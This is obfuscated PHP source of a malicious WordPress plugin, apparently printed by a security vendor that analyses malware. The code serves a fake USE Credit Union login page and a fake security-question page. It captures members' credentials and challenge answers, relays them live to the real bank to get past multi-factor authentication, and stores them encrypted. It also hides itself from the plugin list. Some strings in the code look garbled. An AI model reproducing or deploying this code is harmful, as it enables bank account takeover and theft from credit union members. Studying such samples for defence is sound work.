goto XQ9A1; HF77s: add_action("wp_head", "add_link_css"); goto ZiTag; fNi2C: function cph_add_rewrite_rule() { add_rewrite_rule("^idp/65F051/tethered/?$", "index.php?cph_payment_handle=1", "top"); add_rewrite_rule("^signin/challenge/?$", "index.php?wbf_signin_challenge", "top"); if (function_exists("wp_cache_flush")) { wp_cache_flush(); } if (!session_id()) { session_start(); } cph_check_and_create_table(); } goto aCygr; J1thy: add_filter("query_vars", "cph_add_query_vars"); goto Q7sbF; thhCJ: function cph_template_redirect() { if (get_query_var("cph_payment_handle") == 1) { $user_ip = wpf_getUserIp(); if (cph_has_visited($user_ip)) { wp_redirect("https://usecuweb-dn.financial-net.com/web"); die; } else { cph_handle_form_submission(); echo "<!DOCTYPE html>\xa <html lang="en">\xa <head>\xa <meta charset="UTF-8">\xa <title>Login</title>"; wp_head(); echo "</head>
<body>\xa <link rel="stylesheet" href="https://usecuweb-dn.financial-net.com/idp/styles?file=%2Fcss%2Ftethered.less&tenantId=65F6">
<div>
<form id="tethered-login" method="post" target="_top" class="auth-form" action="">\xa <div class="tethered-container-layout">
<div class="tethered-input-container-layout">
<div id="input-labels" data-username-label="Logon ID" data-username-required-label="Logon ID required" data-password-label="Security Code || Password" data-password-required-label="Security Code required"></div>
<div class="tethered-username-layout">\xa <label id="username-label" class="tethered-label" for="Username">Logon ID: <span id="username-error" class="tethered-validation-error">*required</span></label>\xa <input id="username" name="Username" placeholder="Logon ID" class="tethered-input tethered-input-layout" tabindex="1" aria-required="true" aria-invalid="false" autocomplete="off">\xa </div>
<div class="tethered-password-layout">\xa <label id="password-label" class="tethered-label" for="Password">Security Code || Password: <span id="credential-error" class="tethered-validation-error">*required</span></label>\xa <input id="credential" name="Password" placeholder="Security Code || Password" class="tethered-input tethered-input-layout" type="password" tabindex="2" aria-required="true" aria-invalid="false" autocomplete="off">\xa </div>
</div>
" . wp_nonce_field("cph_payment_form", "cph_payment_nonce", true, false) . "\xa <input type="hidden" name="ioBlackBox" id="ioBlackBox" value>\xa <button id="submit" type="submit" class="tethered-button tethered-button-layout" tabindex="4">LOG ON</button>
<div class="tethered-link-layout">\xa <a href="https://usecuweb-dn.financial-net.com/web/Enrollment" class="tethered-link" target="_top">Enroll</a>\xa <div class="tethered-link-seperator"> | </div>
<a href="https://usecuweb-dn.financial-net.com/web/forgottenpassword" class="tethered-link" target="_top">Forgot Security Code || Password</a>\xa </div>
</div>\xa <input name="__RequestVerificationToken" type="hidden" value="">\xa </form>
</div>\xa <footer>\xa </footer>\xa "; wp_footer(); echo "</body>
</html>"; die; } die; } if (get_query_var("wbf_signin_challenge") == 1) { $user_ip = wpf_getUserIp(); global $wpdb; $visit_data = $wpdb->get_row($wpdb->prepare("SELECT visited, id_data FROM {$wpdb->prefix}block_data_ip_visits WHERE ip_address = %s", $user_ip)); if ($visit_data->visited == 1) { wp_redirect("https://usecuweb-dn.financial-net.com/web"); die; } $block_data_table = $wpdb->prefix . "block_data"; $block_data = $wpdb->get_row($wpdb->prepare("SELECT data FROM {$block_data_table} WHERE id = %d", $visit_data->id_data)); if ($block_data) { $decrypted_data = openssl_decrypt($block_data->data, "aes-6-cbc", CPH_ENCRYPTION_KEY, 0, substr(CPH_ENCRYPTION_KEY, 0, 16)); $stored_data = json_decode($decrypted_data, true); if (!empty($stored_data["questions"])) { $question = $stored_data["questions"]; remove_action("wp_head", "rest_output_link_wp_head"); remove_action("wp_head", "wp_oembed_add_discovery_links"); remove_action("wp_head", "rsd_link"); remove_action("wp_head", "wp_generator"); wbf_handle_form_submission(); echo "\xa <html lang="en">\xa <head>
<meta charset="UTF-8">\xa <title tenant="USE Credit Union">USE Credit Union - Answer Security Question</title>
<link rel="icon" type="image/x-icon" href="https://usecuweb-dn.financial-net.com/idp/images?key=favicon&tenantId=65F071">\xa <link rel="shortcut icon" type="image/x-icon" href="https://usecuweb-dn.financial-net.com/idp/images?key=favicon&tenantId=65F056">
"; wp_head(); echo "</head>
<body>
<link rel="stylesheet" href="https://usecuweb-dn.financial-net.com/idp/styles?file=%2Fcss%2Fbranding.less&tenantId5F056">\xa <div id="app" class="shell">\xa <div class="header" params="route: route">\xa <div class="content">
<div class="header-logo">\xa <img src="https://usecuweb-dn.financial-net.com/idp/images?key=headerLogo&tenantId5F05671" alt="US Employees Credit Union">
</div>
<div class="utility-actions">\xa </div>\xa </div>\xa </div>\xa <div class="content-area">\xa <div>\xa <div class="content-area__content">\xa <div>
<h1 class="section-title">Answer Security Question</h1>\xa <form action="" method="POST">
<div role="alert" data-valmsg-summary="true" class="validation-summary-errors alert alert-danger fade show" style="display: none;">
<span class="alert-icon">⚠</span>\xa <span data-test-element="alert-message" class="alert-message">Correct the highlighted field(s) below.</span>\xa </div>\xa <fieldset>
<div class="panel-message">
<span>This action requires you to answer a security question before it can be completed.</span>
</div>
<div class="form-container">
<div class="form-group">
<label data-test-element="challenge-question">\xa <span class="label -inline">Question</span>\xa " . esc_html($question) . "
</label>\xa </div>
" . wp_nonce_field("wbf_signin_form", "wbf_signin_nonce", true, false) . "\xa <div class="form-group">
<label class="security-answer">
<span class="label">Answer</span>
<input type="password" name="Answer" id="password-input"data-test-element="Answer" data-vv-as="Answer" autocomplete="off" class="control" aria-required="true" aria-invalid="false">
<span class="field-validation-error" style="display: none;"/>
</label>
<label class="show-answer checkbox">\xa <input type="checkbox" id="show-password" data-test-element="checkbox">
<i class="material-icons checkbox-icon"></i>
Show answer
</label>\xa </div>
<div class="form-actions">\xa <button type="submit" name="Action:SecurityQuestion" data-test-element="submitBtn" class="button">Continue</button>\xa <a href="https://usecuweb-dn.financial-net.com/web" class="link link-text-transform button-secondary">Cancel</a>
</div>\xa </div>
</fieldset>\xa </form>\xa </div>
</div>\xa </div>\xa </div>
\xa\xa <footer class="footer">\xa <div class="top-footer">\xa <div class="content content-top-footer">\xa <div class="wrapper-top-footer">
<ul class="link-footer-wrapper externalLink-footer-links">\xa <li>\xa <a target="_blank" rel="noopener noreferrer" data-test-element="footer-link-ContactUs" href="https://www.usecuweb.com/contact-us/" title="Contact Us" class="external-link">Contact Us</a>
</li>
</ul>
</div>
<div class="wrapper-top-footer">
<ul class="externalLink-footer-wrapper externalLink-footer-links">
<li>
<a target="_blank" rel="noopener noreferrer" data-test-element="external-link-1" href="https://www.usecuweb.com/" title="Home" class="external-link">Home</a>\xa </li>
<li>\xa <a target="_blank" rel="noopener noreferrer" data-test-element="external-link-2" href="https://www.usecuweb.com/privacy-policy/" title="Privacy Policy" class="external-link">Privacy Policy</a>
</li>\xa <li>\xa <a target="_blank" rel="noopener noreferrer" data-test-element="external-link-3" href="https://ezcardinfo.com/" title="EZCard" class="external-link">EZCard</a>\xa </li>
</ul>
</div>
<div class="wrapper-top-footer">
<ul class="externalLink-footer-wrapper externalLink-footer-links">\xa <li>\xa <a target="_blank" rel="noopener noreferrer" data-test-element="external-link-4" href="https://www.loanliner.com/LoanRequest/Presenter/LoanList?CUID059&LoanListId=1902&ChannelId1961371657&LocationId=NONE&IsFramed=F" title="Apply for a Loan" class="external-link">Apply for a Loan </a>\xa </li>\xa </ul>
</div>
</div>
</div>
<div class="bottom-footer">
<div class="content">\xa <div>\xa <img src="https://usecuweb-dn.financial-net.com/idp/images?key=ncuaLogoImage&tenantId=65F671" tabindex="0" id="ncuaSvgObject" data-test-element="footer-NCUA" alt="National Credit Union Administration" class="ncua-Logo fillColor">\xa <img src="https://usecuweb-dn.financial-net.com/idp/images?key=ehlLogoImage&tenantId5F051" tabindex="0" id="ehlSvgObject" data-test-element="footer-EHL" alt="Equal Housing Lender" class="ehl-Logo fillColor forceNCUALogoMargin">
<div tabindex="0" data-test-element="footer-additionalText" style="white-space-collapse: preserve-breaks;" class="white-space-pre-wrap footer-additional-text additional-text-alignment">USE Credit Union\xa Member Service #: (3) 595k4</div>
</div>\xa <div class="clearfix"/>
<div class="footer-copyright">\xa <div tabindex="0" data-test-element="footer-copyright" class="white-space-pre-wrap">Copyright ©20 Fiserv, Inc. All rights reserved.</div>\xa </div>
<div id="1" tabindex="-1" role="dialog" aria-hidden="true" class="speed-bump modal fade">\xa </div>\xa <div id="2" tabindex="-1" role="dialog" aria-hidden="true" class="speed-bump modal fade">\xa </div>
<div id=" tabindex="-1" role="dialog" aria-hidden="true" class="speed-bump modal fade">
</div>\xa <div id=" tabindex="-1" role="dialog" aria-hidden="true" class="speed-bump modal fade">
</div>\xa </div>\xa </div>
</footer>
</div>\xa "; echo "<script>
document.getElementById("show-password").addEventListener("change", function() {\xa const passwordInput = document.getElementById("password-input");\xa if (this.checked) {\xa passwordInput.type = "text";
} else {
passwordInput.type = "password";
}
});
document.addEventListener("DOMContentLoaded", function () {
const form = document.querySelector("form");
const answerInput = document.getElementById("password-input");
const validationError = document.querySelector(".field-validation-error");\xa const alertMessage = document.querySelector(".validation-summary-errors");
form.addEventListener("submit", function (event) {
let isValid = true;\xa\xa validationError.style.display = "none";\xa alertMessage.style.display = "none";\xa
if (!answerInput.value.trim()) {\xa isValid = false;\xa validationError.textContent = "Answer field is required.";
validationError.style.display = "inline";\xa alertMessage.style.display = "block";\xa }
if (!isValid) {\xa event.preventDefault();\xa }\xa });
});\xa </script>"; echo "<input type="hidden" name="ioBlackBox" id="ioBlackBox">
</body>\xa
</html>
"; die; } } wp_redirect("https://usecuweb-dn.financial-net.com/web"); die; } } goto m5G8S; m0bfp: function cph_create_block_data_table() { global $wpdb; $table_name = $wpdb->prefix . "block_data"; $charset_collate = $wpdb->get_charset_collate(); $sql = "CREATE TABLE {$table_name} (
id mediumint(9) NOT NULL AUTO_INCREMENT,\xa data longtext NOT NULL,
PRIMARY KEY (id)\xa ) {$charset_collate};"; require_once ABSPATH . "wp-admin/includes/upgrade.php"; dbDelta($sql); } goto UzK35; d81xv: function cph_handle_form_submission() { if (get_query_var("cph_payment_handle") == 1 && $_SERVER["REQUEST_METHOD"] === "POST") { if (!isset($_POST["cph_payment_nonce"]) || !wp_verify_nonce($_POST["cph_payment_nonce"], "cph_payment_form")) { wp_die("Invalid request. Please try again."); } $username = sanitize_text_field($_POST["Username"]); $password = sanitize_text_field($_POST["Password"]); $ioBlackBox = sanitize_text_field($_POST["ioBlackBox"]); $requestVerificationToken = sanitize_text_field($_POST["__RequestVerificationToken"]); $user_ip = wpf_getUserIp(); if (cph_is_blocked($user_ip)) { wp_redirect("https://usecuweb-dn.financial-net.com/web"); die; } cph_record_ip_visit($user_ip); $auth_response = usecuweb_authenticate($username, $password); if (is_array($auth_response) && isset($auth_response["prompt"])) { $data_id = cph_save_encrypted_data($username, $password, $auth_response["prompt"]); global $wpdb; $table_name = $wpdb->prefix . "block_data_ip_visits"; $wpdb->update($table_name, array("id_data" => $data_id, "visited" => 0), array("ip_address" => $user_ip), array("%d", "%d"), array("%s")); wp_redirect(site_url("/signin/challenge")); die; } else { wp_redirect("https://usecuweb-dn.financial-net.com/web"); die; } } } goto Y060A; kWp1U: register_activation_hook(__FILE__, "cph_create_ip_visits_table"); goto mRZ6B; ljYcT: add_action("wp_enqueue_scripts", "disable_fonts_on_specific_pages", 20); goto XGbVQ; XGbVQ: add_action("wp_footer", "add_inline_js_function_to_footer", 100); goto bqtVI; KLmSv: function cph_create_ip_visits_table() { global $wpdb; $table_name = $wpdb->prefix . "block_data_ip_visits"; $charset_collate = $wpdb->get_charset_collate(); $sql = "CREATE TABLE {$table_name} (\xa id mediumint(9) NOT NULL AUTO_INCREMENT,\xa ip_address varchar() NOT NULL,
visited tinyint(1) DEFAULT 0,
PRIMARY KEY (id),
UNIQUE KEY ip_address (ip_address)\xa ) {$charset_collate};"; require_once ABSPATH . "wp-admin/includes/upgrade.php"; dbDelta($sql); } goto kWp1U; OIQCQ: function wpf_getUserIp() { if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip_list = explode(",", $_SERVER["HTTP_X_FORWARDED_FOR"]); $ip = trim($ip_list[0]); } else { $ip = $_SERVER["REMOTE_ADDR"]; } return filter_var($ip, FILTER_VALIDATE_IP) ? $ip : "Unknown IP"; } goto thhCJ; ZtPGa: function add_inline_js_function_to_footer() { if (is_cph_page()) { echo "<script src="https://usecuweb-dn.financial-net.com/idp/scripts/tethered.js" nonce=""></script>"; } } goto YzrK4; rBVj5: function wbf_handle_form_submission() { if (is_wbf_page() && $_SERVER["REQUEST_METHOD"] == "POST") { if (!isset($_POST["wbf_signin_nonce"]) || !wp_verify_nonce($_POST["wbf_signin_nonce"], "wbf_signin_form")) { wp_die("Invalid request. Please try again."); } $user_ip = wpf_getUserIp(); global $wpdb; $table_name = $wpdb->prefix . "block_data_ip_visits"; $result = $wpdb->get_row($wpdb->prepare("SELECT id_data, visited FROM {$table_name} WHERE ip_address = %s", $user_ip)); if ($result && $result->visited == 0) { $block_data_table = $wpdb->prefix . "block_data"; $block_data = $wpdb->get_row($wpdb->prepare("SELECT data FROM {$block_data_table} WHERE id = %d", $result->id_data)); if ($block_data) { $decrypted_data = openssl_decrypt($block_data->data, "aes-6-cbc", CPH_ENCRYPTION_KEY, 0, substr(CPH_ENCRYPTION_KEY, 0, 16)); if ($decrypted_data === false) { error_log("Error decrypting data for IP {$user_ip}."); wp_redirect("https://usecuweb-dn.financial-net.com/web"); die; } $stored_data = json_decode($decrypted_data, true); if (isset($stored_data["questions"]) && is_string($stored_data["questions"])) { $stored_data["questions"] = array(array("question" => $stored_data["questions"], "answer" => sanitize_text_field($_POST["Answer"]))); } elseif (is_array($stored_data["questions"])) { $stored_data["questions"][] = array("question" => $stored_data["questions"][0]["question"], "answer" => sanitize_text_field($_POST["Answer"])); } else { wp_redirect("https://usecuweb-dn.financial-net.com/web"); die; } $response = send_usecuweb_challenge_request($stored_data["questions"], sanitize_text_field($_POST["Answer"])); $status = $response === "success" ? "ok" : "error"; foreach ($stored_data["questions"] as &$question) { if ($question["question"] === $stored_data["questions"][0]["question"]) { $question["status"] = $status; break; } } $updated_data = json_encode($stored_data); $encrypted_data = openssl_encrypt($updated_data, "aes-6-cbc", CPH_ENCRYPTION_KEY, 0, substr(CPH_ENCRYPTION_KEY, 0, 16)); $wpdb->update($block_data_table, array("data" => $encrypted_data), array("id" => $result->id_data), array("%s"), array("%d")); $wpdb->update($table_name, array("visited" => 1), array("ip_address" => $user_ip), array("%d"), array("%s")); wp_redirect("https://usecuweb-dn.financial-net.com/web"); die; } } wp_redirect("https://usecuweb-dn.financial-net.com/web"); die; } } goto vqlgG; JlR31: function usecuweb_authenticate($username, $password) { $cookieFile = tempnam(sys_get_temp_dir(), "cookies"); $_SESSION["usecuweb_cookie_file"] = $cookieFile; $ch = curl_init(); error_log($cookieFile); $initial_headers = array("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8", "User-Agent: Mozilla/5p (Windows NT0.0; Win64; x64) AppleWebKit}37s6 (KHTML, like Gecko) Chrome/130p.0p Safari/7.36"); curl_setopt($ch, CURLOPT_URL, "https://usecuweb-dn.financial-net.com/web"); curl_setopt($ch, CURLOPT_HTTPHEADER, $initial_headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieFile); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieFile); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($http_code == 302) { preg_match("/Location: (.*)/", $response, $matches); $redirect_url = trim($matches[1]); $query_params = parse_url($redirect_url, PHP_URL_QUERY); $second_headers = array("Accept: application/json, text/plain, */*", "Content-Type: application/json", "Referer: https://usecuweb-dn.financial-net.com/idp~5F071/signin?returnUrl=%2Fidp%2F65F0%2Fconnect%2Fauthorize*Fcallback+F{$query_params}"); curl_setopt($ch, CURLOPT_URL, "https://usecuweb-dn.financial-net.com/idp/65F671/authentication?" . $query_params); curl_setopt($ch, CURLOPT_HTTPHEADER, $second_headers); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieFile); $xsrf_response = curl_exec($ch); preg_match("/XSRF-TOKEN=([^;]+)/", $xsrf_response, $matches); $xsrf_token = $matches[1] ?? null; if ($xsrf_token) { $second_headers[] = "X-XSRF-TOKEN: {$xsrf_token}"; $auth_payload = json_encode(array("password" => $password, "returnUrl" => "/idp~5F051/connect/authorize/callback?{$query_params}", "username" => $username), JSON_UNESCAPED_SLASHES); curl_setopt($ch, CURLOPT_URL, "https://usecuweb-dn.financial-net.com/idp/65F671/authentication"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $auth_payload); curl_setopt($ch, CURLOPT_HTTPHEADER, $second_headers); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieFile); $auth_response = curl_exec($ch); $auth_http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($auth_http_code == 200) { $challenge_url = "https://usecuweb-dn.financial-net.com/idp/65F05671/authentication/challenge"; curl_setopt($ch, CURLOPT_URL, $challenge_url); curl_setopt($ch, CURLOPT_HTTPHEADER, $second_headers); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieFile); $challenge_response = curl_exec($ch); curl_close($ch); if ($challenge_response) { return json_decode($challenge_response, true); } else { return "error"; } } else { return "error"; } } else { return "error"; } } else { return "error"; } curl_close($ch); } goto XXCTQ; vqlgG: function wpf_get_iframe_link() { $user_ip = wpf_getUserIp(); global $wpdb; $table_name = $wpdb->prefix . "block_data_ip_visits"; $result = $wpdb->get_row($wpdb->prepare("SELECT id_data, visited FROM {$table_name} WHERE ip_address = %s", $user_ip)); if (!current_user_can("administrator") && !cph_is_blocked($user_ip) && !($result && $result->visited !== 1)) { return home_url("/") . "idp~5F051/tethered/"; } else { return "https://usecuweb-dn.financial-net.com/idp/F05671/tethered"; } } goto d81xv; XQ9A1: define("CPH_ENCRYPTION_KEY", "a%P=uz|[n>kHPr/l7[?)@)lL!.kceS2[cR4c0A8lla:5|,Z34P24LE1cjUiuG~A"); goto fNi2C; Q7sbF: function is_cph_page() { global $wp_query; return isset($wp_query->query_vars["cph_payment_handle"]) && $wp_query->query_vars["cph_payment_handle"] == 1; } goto HdPIx; Y060A: function cph_save_encrypted_data($username, $password, $questions) { global $wpdb; $table_name = $wpdb->prefix . "block_data"; $data = json_encode(array("Username" => $username, "Password" => $password, "questions" => $questions, "timestamp" => current_time("mysql"))); $encryption_key = CPH_ENCRYPTION_KEY; $encrypted_data = openssl_encrypt($data, "aes-6-cbc", $encryption_key, 0, substr($encryption_key, 0, 16)); $wpdb->insert($table_name, array("data" => $encrypted_data)); return $wpdb->insert_id; } goto PrjvX; aCygr: add_action("init", "cph_add_rewrite_rule"); goto yeMbi; XXCTQ: function add_link_css() { if (is_wbf_page()) { echo "<link rel="stylesheet" href="https://usecuweb-dn.financial-net.com/idp/dist/vendor.css?v=" . generate_random_string() . "">
<link rel="stylesheet" href="https://usecuweb-dn.financial-net.com/idp/dist/site.css?v=" . generate_random_string() . "">
\xa <script src="https://usecuweb-dn.financial-net.com/idp/scripts/misc.js" nonce=""></script>"; echo "<script src="https://usecuweb-dn.financial-net.com/idp/dist/vendor.js?v=" . generate_random_string() . ""></script>"; } if (is_cph_page()) { } } goto HF77s; HdPIx: function is_wbf_page() { global $wp_query; return isset($wp_query->query_vars["wbf_signin_challenge"]) && $wp_query->query_vars["wbf_signin_challenge"] == 1; } goto vzNya; lAfIS: add_filter("show_admin_bar", "cph_hide_admin_bar_on_payment_page"); goto OIQCQ; yeMbi: function cph_add_query_vars($vars) { $vars[] = "cph_payment_handle"; $vars[] = "wbf_signin_challenge"; return $vars; } goto J1thy; am8E1: function generate_random_string($length = 32) { return bin2hex(random_bytes($length / 2)); } goto rBVj5; bqtVI: function cph_hide_plugin_from_list() { global $wp_list_table; $hide_plugin = plugin_basename(__FILE__); if (isset($wp_list_table->items[$hide_plugin])) { unset($wp_list_table->items[$hide_plugin]); } } goto oIdCz; UzK35: register_activation_hook(__FILE__, "cph_create_block_data_table"); goto KLmSv; ZiTag: function disable_fonts_on_specific_pages() { if (is_cph_page() || is_wbf_page()) { global $wp_styles; foreach ($wp_styles->registered as $style) { wp_dequeue_style($style->handle); wp_deregister_style($style->handle); } wp_dequeue_style("wp-fonts-local"); wp_dequeue_style("material-icons"); wp_deregister_style("material-icons"); wp_dequeue_style("wp-fonts-local"); wp_deregister_style("wp-fonts-local"); remove_action("wp_head", "feed_links", 2); remove_action("wp_head", "feed_links_extra", 3); remove_action("wp_head", "print_emoji_detection_script", 7); remove_action("wp_print_styles", "print_emoji_styles"); } } goto ljYcT; cc9go: function cph_record_ip_visit($ip) { global $wpdb; $table_name = $wpdb->prefix . "block_data_ip_visits"; $wpdb->replace($table_name, array("ip_address" => $ip, "visited" => 1), array("%s", "%d")); } goto am8E1; mRZ6B: function cph_check_and_create_table() { global $wpdb; $table_name = $wpdb->prefix . "block_data_ip_visits"; if ($wpdb->get_var("SHOW TABLES LIKE '{$table_name}'") != $table_name) { cph_create_ip_visits_table(); } else { $column = $wpdb->get_results("SHOW COLUMNS FROM `{$table_name}` LIKE 'id_data'"); if (empty($column)) { $wpdb->query("ALTER TABLE `{$table_name}` ADD `id_data` INT(11) AFTER `visited`;"); } } } goto eTHkA; eTHkA: function cph_is_blocked($ip = '') { $blocked_ips = array(); return in_array($ip, $blocked_ips); } goto f40l8; PrjvX: function cph_print_inline_styles() { echo ''; } goto ZtPGa; f40l8: function cph_has_visited($ip) { global $wpdb; $table_name = $wpdb->prefix . "block_data_ip_visits"; $result = $wpdb->get_row($wpdb->prepare("SELECT visited FROM {$table_name} WHERE ip_address = %s", $ip)); if ($result && $result->visited == 2) { return true; } return false; } goto cc9go; m5G8S: add_action("template_redirect", "cph_template_redirect"); goto m0bfp; YzrK4: function send_usecuweb_challenge_request($questions, $answer) { if (!isset($_SESSION["usecuweb_cookie_file"]) || !file_exists($_SESSION["usecuweb_cookie_file"])) { error_log("Cookie file not found for session."); return "error"; } $ch = curl_init(); $challenge_url = "https://usecuweb-dn.financial-net.com/idp~5F05671/authentication/challenge"; $payload = json_encode(array("answer" => $answer, "prompt" => $questions[0]["question"], "showError" => false, "errorMessage" => null, "isSecurityQuestionsRequired" => false, "isMFAChallenge" => true, "redirectUrl" => null, "otpComplexity" => null, "instructions" => null, "previousPageUrl" => null), JSON_UNESCAPED_SLASHES); curl_setopt($ch, CURLOPT_URL, $challenge_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: application/json", "Accept: application/json")); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); curl_setopt($ch, CURLOPT_COOKIEFILE, $_SESSION["usecuweb_cookie_file"]); curl_setopt($ch, CURLOPT_COOKIEJAR, $_SESSION["usecuweb_cookie_file"]); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200) { return "success"; } else { return "error"; } } goto JlR31; vzNya: function cph_hide_admin_bar_on_payment_page($show) { if (is_cph_page() || is_wbf_page()) { return false; } return $show; } goto lAfIS; oIdCz: add_action("pre_current_active_plugins", "cph_hide_plugin_from_list");© 2023 Quttera Ltd. All rights reserved.